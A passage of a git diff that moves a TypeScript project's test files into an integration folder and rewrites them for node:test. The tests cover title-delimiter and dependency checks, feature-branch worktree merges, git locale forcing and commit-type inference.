-    assertTrue(result!.includes("em/en dash"), "message mentions em/en dash");
-    assertTrue(result!.includes("forward slash"), "message mentions forward slash");
-  }
+    assert.ok(result !== null, "detects both delimiters");
+    assert.ok(result!.includes("em/en dash"), "message mentions em/en dash");
+    assert.ok(result!.includes("forward slash"), "message mentions forward slash");
+  });
 
   // ─── doctor detects delimiter_in_title for milestone ───────────────────
-  console.log("\n=== doctor detects em dash in milestone title ===");
-  {
+  test('doctor detects em dash in milestone title', async () => {
     const dtBase = mkdtempSync(join(tmpdir(), "gsd-doctor-dt-test-"));
     const dtGsd = join(dtBase, ".gsd");
     const dtMDir = join(dtGsd, "milestones", "M001");
@@ -526,20 +497,19 @@ Discovered an issue.
 
     const report = await runGSDDoctor(dtBase, { fix: false });
     const dtIssues = report.issues.filter(i => i.code === "delimiter_in_title");
-    assertTrue(dtIssues.length >= 1, "detects delimiter_in_title for milestone with em dash");
+    assert.ok(dtIssues.length >= 1, "detects delimiter_in_title for milestone with em dash");
     const milestoneIssue = dtIssues.find(i => i.scope === "milestone");
-    assertTrue(milestoneIssue !== undefined, "delimiter issue has milestone scope");
-    assertEq(milestoneIssue?.severity, "warning", "delimiter issue has warning severity");
-    assertEq(milestoneIssue?.unitId, "M001", "delimiter issue unitId is M001");
-    assertTrue(milestoneIssue?.message?.includes("em/en dash") ?? false, "issue message mentions em/en dash");
-    assertEq(milestoneIssue?.fixable, true, "delimiter issue is auto-fixable");
+    assert.ok(milestoneIssue !== undefined, "delimiter issue has milestone scope");
+    assert.deepStrictEqual(milestoneIssue?.severity, "warning", "delimiter issue has warning severity");
+    assert.deepStrictEqual(milestoneIssue?.unitId, "M001", "delimiter issue unitId is M001");
+    assert.ok(milestoneIssue?.message?.includes("em/en dash") ?? false, "issue message mentions em/en dash");
+    assert.deepStrictEqual(milestoneIssue?.fixable, true, "delimiter issue is auto-fixable");
 
     rmSync(dtBase, { recursive: true, force: true });
-  }
+  });
 
   // ─── doctor detects delimiter_in_title for slice ────────────────────────
-  console.log("\n=== doctor detects em dash in slice title ===");
-  {
+  test('doctor detects em dash in slice title', async () => {
     const dtBase = mkdtempSync(join(tmpdir(), "gsd-doctor-dt-slice-"));
     const dtGsd = join(dtBase, ".gsd");
     const dtMDir = join(dtGsd, "milestones", "M001");
@@ -554,18 +524,17 @@ Discovered an issue.
 
     const report = await runGSDDoctor(dtBase, { fix: false });
     const dtIssues = report.issues.filter(i => i.code === "delimiter_in_title");
-    assertTrue(dtIssues.length >= 1, "detects delimiter_in_title for slice with em dash");
+    assert.ok(dtIssues.length >= 1, "detects delimiter_in_title for slice with em dash");
     const sliceIssue = dtIssues.find(i => i.scope === "slice");
-    assertTrue(sliceIssue !== undefined, "delimiter issue has slice scope");
-    assertEq(sliceIssue?.severity, "warning", "slice delimiter issue has warning severity");
-    assertEq(sliceIssue?.unitId, "M001/S01", "slice delimiter issue unitId is M001/S01");
+    assert.ok(sliceIssue !== undefined, "delimiter issue has slice scope");
+    assert.deepStrictEqual(sliceIssue?.severity, "warning", "slice delimiter issue has warning severity");
+    assert.deepStrictEqual(sliceIssue?.unitId, "M001/S01", "slice delimiter issue unitId is M001/S01");
 
     rmSync(dtBase, { recursive: true, force: true });
-  }
+  });
 
   // ─── doctor does NOT flag clean titles ──────────────────────────────────
-  console.log("\n=== doctor does NOT flag milestone with clean title ===");
-  {
+  test('doctor does NOT flag milestone with clean title', async () => {
     const dtBase = mkdtempSync(join(tmpdir(), "gsd-doctor-dt-clean-"));
     const dtGsd = join(dtBase, ".gsd");
     const dtMDir = join(dtGsd, "milestones", "M001");
@@ -580,14 +549,13 @@ Discovered an issue.
 
     const report = await runGSDDoctor(dtBase, { fix: false });
     const dtIssues = report.issues.filter(i => i.code === "delimiter_in_title");
-    assertEq(dtIssues.length, 0, "no delimiter_in_title issues for clean titles");
+    assert.deepStrictEqual(dtIssues.length, 0, "no delimiter_in_title issues for clean titles");
 
     rmSync(dtBase, { recursive: true, force: true });
-  }
+  });
 
   // ─── unresolvable_dependency: range syntax dep warns ─────────────────
-  console.log("\n=== doctor: unresolvable_dependency warns for leftover range ID ===");
-  {
+  test('doctor: unresolvable_dependency warns for leftover range ID', async () => {
     // Simulate a roadmap where expandDependencies did NOT expand (pre-fix stored artifact)
     // by writing a dep that looks like a range but doesn't match any real slice.
     const base = mkdtempSync(join(tmpdir(), "gsd-doctor-udep-"));
@@ -609,16 +577,15 @@ Discovered an issue.
 
     const r = await runGSDDoctor(base, { fix: false });
     const udepIssues = r.issues.filter(i => i.code === "unresolvable_dependency");
-    assertTrue(udepIssues.length > 0, "unresolvable_dependency fires for unknown dep S99");
-    assertEq(udepIssues[0]?.severity, "warning", "severity is warning");
-    assertTrue(udepIssues[0]?.message.includes("S99"), "message names the bad dep");
+    assert.ok(udepIssues.length > 0, "unresolvable_dependency fires for unknown dep S99");
+    assert.deepStrictEqual(udepIssues[0]?.severity, "warning", "severity is warning");
+    assert.ok(udepIssues[0]?.message.includes("S99"), "message names the bad dep");
 
     rmSync(base, { recursive: true, force: true });
-  }
+  });
 
   // ─── unresolvable_dependency: valid deps do not warn ─────────────────
-  console.log("\n=== doctor: no unresolvable_dependency for valid deps ===");
-  {
+  test('doctor: no unresolvable_dependency for valid deps', async () => {
     const base = mkdtempSync(join(tmpdir(), "gsd-doctor-udep-ok-"));
     const mDir2 = join(base, ".gsd", "milestones", "M001");
     const sDir2 = join(mDir2, "slices", "S01");
@@ -638,15 +605,8 @@ Discovered an issue.
 
     const r = await runGSDDoctor(base, { fix: false });
     const udepIssues = r.issues.filter(i => i.code === "unresolvable_dependency");
-    assertEq(udepIssues.length, 0, "no unresolvable_dependency for valid S01 dep");
+    assert.deepStrictEqual(udepIssues.length, 0, "no unresolvable_dependency for valid S01 dep");
 
     rmSync(base, { recursive: true, force: true });
-  }
-
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
+  });
 });
diff --git a/src/resources/extensions/gsd/tests/e2e-workflow-pipeline-integration.test.ts b/src/resources/extensions/gsd/tests/integration/e2e-workflow-pipeline-integration.test.ts
similarity index 98%
rename from src/resources/extensions/gsd/tests/e2e-workflow-pipeline-integration.test.ts
rename to src/resources/extensions/gsd/tests/integration/e2e-workflow-pipeline-integration.test.ts
index 419ac5762..4b3ae61be 100644
--- a/src/resources/extensions/gsd/tests/e2e-workflow-pipeline-integration.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/e2e-workflow-pipeline-integration.test.ts
@@ -34,11 +34,11 @@ import { join } from "node:path";
 import { tmpdir } from "node:os";
 import { stringify, parse } from "yaml";
 
-import { CustomWorkflowEngine } from "../custom-workflow-engine.ts";
-import { CustomExecutionPolicy } from "../custom-execution-policy.ts";
-import { createRun, listRuns } from "../run-manager.ts";
-import { readGraph, writeGraph } from "../graph.ts";
-import { validateDefinition } from "../definition-loader.ts";
+import { CustomWorkflowEngine } from "../../custom-workflow-engine.ts";
+import { CustomExecutionPolicy } from "../../custom-execution-policy.ts";
+import { createRun, listRuns } from "../../run-manager.ts";
+import { readGraph, writeGraph } from "../../graph.ts";
+import { validateDefinition } from "../../definition-loader.ts";
 
 // ─── Helpers ─────────────────────────────────────────────────────────────
 
diff --git a/src/resources/extensions/gsd/tests/feature-branch-lifecycle-integration.test.ts b/src/resources/extensions/gsd/tests/integration/feature-branch-lifecycle-integration.test.ts
similarity index 80%
rename from src/resources/extensions/gsd/tests/feature-branch-lifecycle-integration.test.ts
rename to src/resources/extensions/gsd/tests/integration/feature-branch-lifecycle-integration.test.ts
index 10158295a..e6cb849a8 100644
--- a/src/resources/extensions/gsd/tests/feature-branch-lifecycle-integration.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/feature-branch-lifecycle-integration.test.ts
@@ -1,3 +1,5 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 /**
  * feature-branch-lifecycle.test.ts — Integration tests for the feature-branch workflow.
  *
@@ -24,14 +26,10 @@ import {
   createAutoWorktree,
   mergeMilestoneToMain,
   autoWorktreeBranch,
-} from "../auto-worktree.ts";
-import { captureIntegrationBranch, getSliceBranchName } from "../worktree.ts";
-import { writeIntegrationBranch, readIntegrationBranch } from "../git-service.ts";
-import { nextMilestoneId, generateMilestoneSuffix } from "../guided-flow.ts";
-
-import { createTestContext } from "./test-helpers.ts";
-
-const { assertEq, assertTrue, assertMatch, report } = createTestContext();
+} from "../../auto-worktree.ts";
+import { captureIntegrationBranch, getSliceBranchName } from "../../worktree.ts";
+import { writeIntegrationBranch, readIntegrationBranch } from "../../git-service.ts";
+import { nextMilestoneId, generateMilestoneSuffix } from "../../guided-flow.ts";
 
 // ─── Helpers ────────────────────────────────────────────────────────────────
 
@@ -137,7 +135,7 @@ function addSliceToMilestone(
 
 // ─── Tests ──────────────────────────────────────────────────────────────────
 
-async function main(): Promise<void> {
+describe('feature-branch-lifecycle-integration', async () => {
   const savedCwd = process.cwd();
   const tempDirs: string[] = [];
 
@@ -154,14 +152,13 @@ async function main(): Promise<void> {
     // Start on f-new-shiny-thing with uncommitted changes, create
     // worktree, add slices, merge back. Assert main is untouched.
     // ================================================================
-    console.log("\n=== Feature-branch lifecycle with unique milestone IDs ===");
-    {
+    test('Feature-branch lifecycle with unique milestone IDs', () => {
       const featureBranch = "f-new-shiny-thing";
       const repo = fresh(featureBranch);
 
       // Generate a unique milestone ID (M001-xxxxxx format)
       const milestoneId = nextMilestoneId([], true);
-      assertMatch(milestoneId, /^M001-[a-z0-9]{6}$/, "unique milestone ID format");
+      assert.match(milestoneId, /^M001-[a-z0-9]{6}$/, "unique milestone ID format");
 
       // Snapshot main before anything happens
       const mainShaBefore = headSha(repo, "main");
@@ -174,8 +171,8 @@ async function main(): Promise<void> {
 
       // Verify files are uncommitted
       const statusBefore = run("git status --short", repo);
-      assertTrue(statusBefore.includes("wip-config.ts"), "wip-config.ts is uncommitted");
-      assertTrue(statusBefore.includes("wip-types.ts"), "wip-types.ts is uncommitted");
+      assert.ok(statusBefore.includes("wip-config.ts"), "wip-config.ts is uncommitted");
+      assert.ok(statusBefore.includes("wip-types.ts"), "wip-types.ts is uncommitted");
 
       // ── Simulate what startAuto does: commit dirty state, capture integration branch ──
       // startAuto bootstraps .gsd/ which commits .gsd/ files. It also calls
@@ -198,7 +195,7 @@ async function main(): Promise<void> {
 
       // Verify integration branch recorded
       const recorded = readIntegrationBranch(repo, milestoneId);
-      assertEq(recorded, featureBranch, "integration branch recorded as feature branch");
+      assert.deepStrictEqual(recorded, featureBranch, "integration branch recorded as feature branch");
 
       // Snapshot feature branch SHA after metadata commit (HEAD may have advanced)
       const featureShaBeforeWorktree = headSha(repo, featureBranch);
@@ -206,28 +203,28 @@ async function main(): Promise<void> {
       // ── Create the auto-worktree ──
       const wtPath = createAutoWorktree(repo, milestoneId);
       tempDirs.push(wtPath);
-      assertTrue(existsSync(wtPath), "worktree directory created");
+      assert.ok(existsSync(wtPath), "worktree directory created");
 
       // Worktree should be on milestone/<unique-id> branch
       const wtBranch = run("git branch --show-current", wtPath);
-      assertEq(wtBranch, `milestone/${milestoneId}`, "worktree is on milestone branch");
+      assert.deepStrictEqual(wtBranch, `milestone/${milestoneId}`, "worktree is on milestone branch");
 
       // Milestone branch should be rooted at the feature branch, not main
       const milestoneBranchBase = headSha(repo, `milestone/${milestoneId}`);
-      assertEq(
+      assert.deepStrictEqual(
         milestoneBranchBase,
         featureShaBeforeWorktree,
         "milestone branch starts from feature branch HEAD",
       );
 
       // Feature-branch-only file should be in the worktree
-      assertTrue(
+      assert.ok(
         existsSync(join(wtPath, "feature-setup.ts")),
         "feature branch file (feature-setup.ts) exists in worktree",
       );
 
       // Main should be completely untouched at this point
-      assertEq(headSha(repo, "main"), mainShaBefore, "main SHA unchanged after worktree creation");
+      assert.deepStrictEqual(headSha(repo, "main"), mainShaBefore, "main SHA unchanged after worktree creation");
 
       // ── Do work in slices ──
       addSliceToMilestone(wtPath, milestoneId, "S01", "Auth module", [
@@ -250,62 +247,62 @@ async function main(): Promise<void> {
 
       // ── Assert: feature branch received the merge ──
       const currentBranch = run("git branch --show-current", repo);
-      assertEq(currentBranch, featureBranch, "repo is on feature branch after merge");
+      assert.deepStrictEqual(currentBranch, featureBranch, "repo is on feature branch after merge");
 
       // Exactly one new commit on feature branch (the squash merge)
       const featureLog = run(`git log --oneline ${featureBranch}`, repo);
-      assertTrue(
-        featureLog.includes(`feat(${milestoneId})`),
+      assert.ok(
+        featureLog.includes("feat:"),
         "feature branch has milestone merge commit",
       );
 
       // Slice files are on the feature branch
-      assertTrue(existsSync(join(repo, "auth.ts")), "auth.ts on feature branch");
-      assertTrue(existsSync(join(repo, "dashboard.ts")), "dashboard.ts on feature branch");
-      assertTrue(existsSync(join(repo, "auth-utils.ts")), "auth-utils.ts on feature branch");
+      assert.ok(existsSync(join(repo, "auth.ts")), "auth.ts on feature branch");
+      assert.ok(existsSync(join(repo, "dashboard.ts")), "dashboard.ts on feature branch");
+      assert.ok(existsSync(join(repo, "auth-utils.ts")), "auth-utils.ts on feature branch");
 
       // Original feature branch file still present
-      assertTrue(existsSync(join(repo, "feature-setup.ts")), "feature-setup.ts still on feature branch");
+      assert.ok(existsSync(join(repo, "feature-setup.ts")), "feature-setup.ts still on feature branch");
 
       // Commit message is well-formed
-      assertTrue(result.commitMessage.includes("New shiny feature"), "commit message has milestone title");
-      assertTrue(result.commitMessage.includes("S01: Auth module"), "commit message lists S01");
-      assertTrue(result.commitMessage.includes("S02: Dashboard"), "commit message lists S02");
-      assertTrue(
+      assert.ok(result.commitMessage.includes("New shiny feature"), "commit message has milestone title");
+      assert.ok(result.commitMessage.includes("S01: Auth module"), "commit message lists S01");
+      assert.ok(result.commitMessage.includes("S02: Dashboard"), "commit message lists S02");
+      assert.ok(
         result.commitMessage.includes(`milestone/${milestoneId}`),
         "commit message references milestone branch with unique ID",
       );
 
       // ── Assert: main is COMPLETELY untouched ──
-      assertEq(headSha(repo, "main"), mainShaBefore, "main SHA unchanged after merge");
-      assertEq(commitCount(repo, "main"), mainCommitsBefore, "main commit count unchanged");
+      assert.deepStrictEqual(headSha(repo, "main"), mainShaBefore, "main SHA unchanged after merge");
+      assert.deepStrictEqual(commitCount(repo, "main"), mainCommitsBefore, "main commit count unchanged");
 
       // Main should NOT have any of the milestone files
       run("git checkout main", repo);
-      assertTrue(!existsSync(join(repo, "auth.ts")), "auth.ts NOT on main");
-      assertTrue(!existsSync(join(repo, "dashboard.ts")), "dashboard.ts NOT on main");
-      assertTrue(!existsSync(join(repo, "feature-setup.ts")), "feature-setup.ts NOT on main");
+      assert.ok(!existsSync(join(repo, "auth.ts")), "auth.ts NOT on main");
+      assert.ok(!existsSync(join(repo, "dashboard.ts")), "dashboard.ts NOT on main");
+      assert.ok(!existsSync(join(repo, "feature-setup.ts")), "feature-setup.ts NOT on main");
       run(`git checkout ${featureBranch}`, repo);
 
       // ── Assert: worktree cleaned up ──
       const worktreeDir = join(repo, ".gsd", "worktrees", milestoneId);
-      assertTrue(!existsSync(worktreeDir), "worktree directory removed");
+      assert.ok(!existsSync(worktreeDir), "worktree directory removed");
 
       // Milestone branch deleted
-      assertTrue(
+      assert.ok(
         !branchExists(repo, `milestone/${milestoneId}`),
         "milestone branch deleted after merge",
       );
 
       // Only expected branches remain
       const branches = allBranches(repo);
-      assertTrue(branches.includes("main"), "main branch exists");
-      assertTrue(branches.includes(featureBranch), "feature branch exists");
-      assertTrue(
+      assert.ok(branches.includes("main"), "main branch exists");
+      assert.ok(branches.includes(featureBranch), "feature branch exists");
+      assert.ok(
         !branches.some(b => b.startsWith("milestone/")),
         "no milestone branches remain",
       );
-    }
+    });
 
     // ================================================================
     // Test 2: Uncommitted .gsd/ planning files are available in worktree
@@ -314,8 +311,7 @@ async function main(): Promise<void> {
     // Planning artifacts should be carried into the worktree even if
     // they weren't committed on the feature branch.
     // ================================================================
-    console.log("\n=== Untracked planning files copied to worktree ===");
-    {
+    test('Untracked planning files copied to worktree', () => {
       const featureBranch = "f-planning-test";
       const repo = fresh(featureBranch);
       const milestoneId = nextMilestoneId([], true);
@@ -334,7 +330,7 @@ async function main(): Promise<void> {
       writeFileSync(join(repo, ".gsd", "DECISIONS.md"), "# Decisions\n\n## D001\nTest decision.\n");
 
       // These files are untracked
-      assertTrue(run("git status --short", repo).length > 0, "repo has untracked files");
+      assert.ok(run("git status --short", repo).length > 0, "repo has untracked files");
 
       // Record integration branch and create worktree
       writeIntegrationBranch(repo, milestoneId, featureBranch);
@@ -344,11 +340,11 @@ async function main(): Promise<void> {
       // With external state, worktree .gsd is a symlink to shared state.
       // Verify symlink was created (planning files are shared, not copied).
       const wtGsd = join(wtPath, ".gsd");
-      assertTrue(existsSync(wtGsd), "worktree .gsd exists (symlink or dir)");
+      assert.ok(existsSync(wtGsd), "worktree .gsd exists (symlink or dir)");
 
       // Clean up: chdir back before teardown
       process.chdir(savedCwd);
-    }
+    });
 
     // ================================================================
     // Test 3: Multiple milestones on the same feature branch
@@ -356,8 +352,7 @@ async function main(): Promise<void> {
     // Proves that unique IDs prevent collision when running successive
     // milestones, and each merge lands on the feature branch.
     // ================================================================
-    console.log("\n=== Multiple unique milestones on same feature branch ===");
-    {
+    test('Multiple unique milestones on same feature branch', () => {
       const featureBranch = "f-multi-milestone";
       const repo = fresh(featureBranch);
 
@@ -377,12 +372,12 @@ async function main(): Promise<void> {
       mergeMilestoneToMain(repo, mid1, makeRoadmap(mid1, "First", [{ id: "S01", title: "First milestone work" }]));
       process.chdir(savedCwd);
 
-      assertTrue(existsSync(join(repo, "m1-feature.ts")), "m1 file on feature branch");
+      assert.ok(existsSync(join(repo, "m1-feature.ts")), "m1 file on feature branch");
 
       // Second milestone — different unique ID
       const mid2 = nextMilestoneId([mid1], true);
-      assertTrue(mid1 !== mid2, "second milestone has different ID");
-      assertMatch(mid2, /^M002-[a-z0-9]{6}$/, "second milestone is M002-xxxxxx");
+      assert.ok(mid1 !== mid2, "second milestone has different ID");
+      assert.match(mid2, /^M002-[a-z0-9]{6}$/, "second milestone is M002-xxxxxx");
 
       mkdirSync(join(repo, ".gsd", "milestones", mid2), { recursive: true });
       writeIntegrationBranch(repo, mid2, featureBranch);
@@ -397,19 +392,19 @@ async function main(): Promise<void> {
       process.chdir(savedCwd);
 
       // Both milestone files on feature branch
-      assertTrue(existsSync(join(repo, "m1-feature.ts")), "m1 file still on feature branch");
-      assertTrue(existsSync(join(repo, "m2-feature.ts")), "m2 file on feature branch");
+      assert.ok(existsSync(join(repo, "m1-feature.ts")), "m1 file still on feature branch");
+      assert.ok(existsSync(join(repo, "m2-feature.ts")), "m2 file on feature branch");
 
       // Main completely untouched
-      assertEq(headSha(repo, "main"), mainShaBefore, "main unchanged after two milestones");
+      assert.deepStrictEqual(headSha(repo, "main"), mainShaBefore, "main unchanged after two milestones");
 
       // No milestone branches remain
       const branches = allBranches(repo);
-      assertTrue(
+      assert.ok(
         !branches.some(b => b.startsWith("milestone/")),
         "no milestone branches remain after two milestones",
       );
-    }
+    });
 
   } finally {
     process.chdir(savedCwd);
@@ -417,8 +412,4 @@ async function main(): Promise<void> {
       try { rmSync(d, { recursive: true, force: true }); } catch { /* ignore */ }
     }
   }
-
-  report();
-}
-
-main();
+});
diff --git a/src/resources/extensions/gsd/tests/integration/git-locale.test.ts b/src/resources/extensions/gsd/tests/integration/git-locale.test.ts
new file mode 100644
index 000000000..e385ea287
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/git-locale.test.ts
@@ -0,0 +1,119 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+/**
+ * Regression tests for #1997: git locale not forced to C.
+ *
+ * Validates that GIT_NO_PROMPT_ENV includes LC_ALL=C so git always produces
+ * English output, and that nativeMergeSquash passes the env to execFileSync.
+ */
+
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync, readFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { execFileSync } from "node:child_process";
+
+import { GIT_NO_PROMPT_ENV } from "../../git-constants.ts";
+import { nativeAddAllWithExclusions } from "../../native-git-bridge.ts";
+import { RUNTIME_EXCLUSION_PATHS } from "../../git-service.ts";
+function git(cwd: string, ...args: string[]): string {
+  return execFileSync("git", args, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
+}
+
+function initTempRepo(): string {
+  const dir = mkdtempSync(join(tmpdir(), "gsd-locale-"));
+  git(dir, "init");
+  git(dir, "config", "user.email", "test@test.com");
+  git(dir, "config", "user.name", "Test");
+  // Initial commit so HEAD exists
+  writeFileSync(join(dir, "init.txt"), "init");
+  git(dir, "add", "-A");
+  git(dir, "commit", "-m", "init");
+  return dir;
+}
+
+function createFile(base: string, relPath: string, content: string): void {
+  const full = join(base, relPath);
+  mkdirSync(join(full, ".."), { recursive: true });
+  writeFileSync(full, content);
+}
+
+describe('git-locale', async () => {
+  // ─── GIT_NO_PROMPT_ENV includes LC_ALL=C ─────────────────────────────
+
+
+  assert.deepStrictEqual(
+    GIT_NO_PROMPT_ENV.LC_ALL,
+    "C",
+    "GIT_NO_PROMPT_ENV must set LC_ALL to 'C' to force English git output"
+  );
+
+  assert.ok(
+    "GIT_TERMINAL_PROMPT" in GIT_NO_PROMPT_ENV,
+    "GIT_NO_PROMPT_ENV still contains GIT_TERMINAL_PROMPT"
+  );
+
+  // ─── nativeAddAllWithExclusions: non-English locale does not throw ───
+
+  test('nativeAddAllWithExclusions: non-English locale does not throw', () => {
+    // Simulate what happens on a German system: .gsd is gitignored,
+    // exclusion pathspecs trigger an advisory warning exit code 1.
+    // With LC_ALL=C the English stderr guard should match and suppress.
+    const repo = initTempRepo();
+
+    writeFileSync(join(repo, ".gitignore"), ".gsd\n");
+    createFile(repo, ".gsd/STATE.md", "# State");
+    createFile(repo, "src/app.ts", "export const x = 1;");
+
+    // Save original LC_ALL / LANG and force German locale env
+    const origLcAll = process.env.LC_ALL;
+    const origLang = process.env.LANG;
+    process.env.LANG = "de_DE.UTF-8";
+    delete process.env.LC_ALL;
+
+    let threw = false;
+    try {
+      nativeAddAllWithExclusions(repo, RUNTIME_EXCLUSION_PATHS);
+    } catch (e) {
+      threw = true;
+      console.error("  unexpected error:", e);
+    }
+
+    // Restore
+    if (origLcAll !== undefined) process.env.LC_ALL = origLcAll;
+    else delete process.env.LC_ALL;
+    if (origLang !== undefined) process.env.LANG = origLang;
+    else delete process.env.LANG;
+
+    assert.ok(
+      !threw,
+      "nativeAddAllWithExclusions must not throw on non-English locale when .gsd is gitignored (#1997)"
+    );
+
+    const staged = git(repo, "diff", "--cached", "--name-only");
+    assert.ok(staged.includes("src/app.ts"), "real file staged despite German locale");
+
+    rmSync(repo, { recursive: true, force: true });
+  });
+
+  // ─── nativeMergeSquash: env is passed (merge-squash stderr is English) ─
+
+  test('nativeMergeSquash fallback uses GIT_NO_PROMPT_ENV', () => {
+    // We verify indirectly: the source code must pass env: GIT_NO_PROMPT_ENV.
+    // Read the source and check for the pattern. This is a static check.
+    const src = readFileSync(
+      join(import.meta.dirname, "../..", "native-git-bridge.ts"),
+      "utf-8"
+    );
+
+    // Find the nativeMergeSquash function and check it uses GIT_NO_PROMPT_ENV
+    const fnStart = src.indexOf("export function nativeMergeSquash");
+    assert.ok(fnStart !== -1, "nativeMergeSquash function exists in source");
+
+    const fnBody = src.slice(fnStart, src.indexOf("\nexport function", fnStart + 1));
+    const hasEnv = fnBody.includes("env: GIT_NO_PROMPT_ENV");
+    assert.ok(
+      hasEnv,
+      "nativeMergeSquash fallback must pass env: GIT_NO_PROMPT_ENV to execFileSync (#1997)"
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/git-self-heal.test.ts b/src/resources/extensions/gsd/tests/integration/git-self-heal.test.ts
similarity index 99%
rename from src/resources/extensions/gsd/tests/git-self-heal.test.ts
rename to src/resources/extensions/gsd/tests/integration/git-self-heal.test.ts
index 58bf81d59..092cde31c 100644
--- a/src/resources/extensions/gsd/tests/git-self-heal.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/git-self-heal.test.ts
@@ -14,7 +14,7 @@ import assert from "node:assert/strict";
 import {
   abortAndReset,
   formatGitError,
-} from "../git-self-heal.js";
+} from "../../git-self-heal.js";
 
 // ─── Helpers ─────────────────────────────────────────────────────────
 
diff --git a/src/resources/extensions/gsd/tests/git-service.test.ts b/src/resources/extensions/gsd/tests/integration/git-service.test.ts
similarity index 53%
rename from src/resources/extensions/gsd/tests/git-service.test.ts
rename to src/resources/extensions/gsd/tests/integration/git-service.test.ts
index 4dee06271..f88901431 100644
--- a/src/resources/extensions/gsd/tests/git-service.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/git-service.test.ts
@@ -1,3 +1,5 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, writeFileSync, rmSync, existsSync, symlinkSync } from "node:fs";
 import { join, dirname } from "node:path";
 import { tmpdir } from "node:os";
@@ -18,176 +20,172 @@ import {
   type CommitOptions,
   type PreMergeCheckResult,
   type TaskCommitContext,
-} from "../git-service.ts";
-import { nativeAddAllWithExclusions } from "../native-git-bridge.ts";
-import { createTestContext } from './test-helpers.ts';
-
-const { assertEq, assertTrue, report } = createTestContext();
+} from "../../git-service.ts";
+import { nativeAddAllWithExclusions } from "../../native-git-bridge.ts";
 function run(command: string, cwd: string): string {
   return execSync(command, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
 }
 
-async function main(): Promise<void> {
+describe('git-service', async () => {
   // ─── inferCommitType ───────────────────────────────────────────────────
 
-  console.log("\n=== inferCommitType ===");
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Implement user authentication"),
     "feat",
     "generic feature title → feat"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Add dashboard page"),
     "feat",
     "add-style title → feat"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Fix login redirect bug"),
     "fix",
     "title with 'fix' → fix"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Bug in session handling"),
     "fix",
     "title with 'bug' → fix"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Hotfix for production crash"),
     "fix",
     "title with 'hotfix' → fix"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Patch memory leak"),
     "fix",
     "title with 'patch' → fix"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Refactor state management"),
     "refactor",
     "title with 'refactor' → refactor"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Restructure project layout"),
     "refactor",
     "title with 'restructure' → refactor"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Reorganize module imports"),
     "refactor",
     "title with 'reorganize' → refactor"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Update API documentation"),
     "docs",
     "title with 'documentation' → docs"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Add doc for setup guide"),
     "docs",
     "title with 'doc' → docs"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Add unit tests for auth"),
     "test",
     "title with 'tests' → test"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Testing infrastructure setup"),
     "test",
     "title with 'testing' → test"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Chore: update dependencies"),
     "chore",
     "title with 'chore' → chore"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Cleanup unused imports"),
     "chore",
     "title with 'cleanup' → chore"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Clean up stale branches"),
     "chore",
     "title with 'clean up' → chore"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Archive old milestones"),
     "chore",
     "title with 'archive' → chore"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Remove deprecated endpoints"),
     "chore",
     "title with 'remove' → chore"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Delete temp files"),
     "chore",
     "title with 'delete' → chore"
   );
 
   // Mixed keywords — first match wins
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Fix and refactor the login module"),
     "fix",
     "mixed keywords → first match wins (fix before refactor)"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Refactor test utilities"),
     "refactor",
     "mixed keywords → first match wins (refactor before test)"
   );
 
   // Unknown / unrecognized title → feat
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Build the new pipeline"),
     "feat",
     "unrecognized title → feat"
   );
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType(""),
     "feat",
     "empty title → feat"
   );
 
   // Word boundary: "testify" should NOT match "test"
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Testify integration"),
     "feat",
     "'testify' does not match 'test' — word boundary prevents partial match"
   );
 
   // "documentary" should NOT match "doc" (word boundary)
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Documentary style UI"),
     "feat",
     "'documentary' does not match 'doc' — word boundary prevents partial match"
   );
 
   // "prefix" should NOT match "fix" (word boundary)
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("Add prefix to all IDs"),
     "feat",
     "'prefix' does not match 'fix' — word boundary prevents partial match"
@@ -195,15 +193,14 @@ async function main(): Promise<void> {
 
   // ─── inferCommitType with oneLiner ──────────────────────────────────────
 
-  console.log("\n=== inferCommitType with oneLiner ===");
 
-  assertEq(
+  assert.deepStrictEqual(
     inferCommitType("implement dashboard", "Fixed rendering bug in sidebar"),
     "fix",
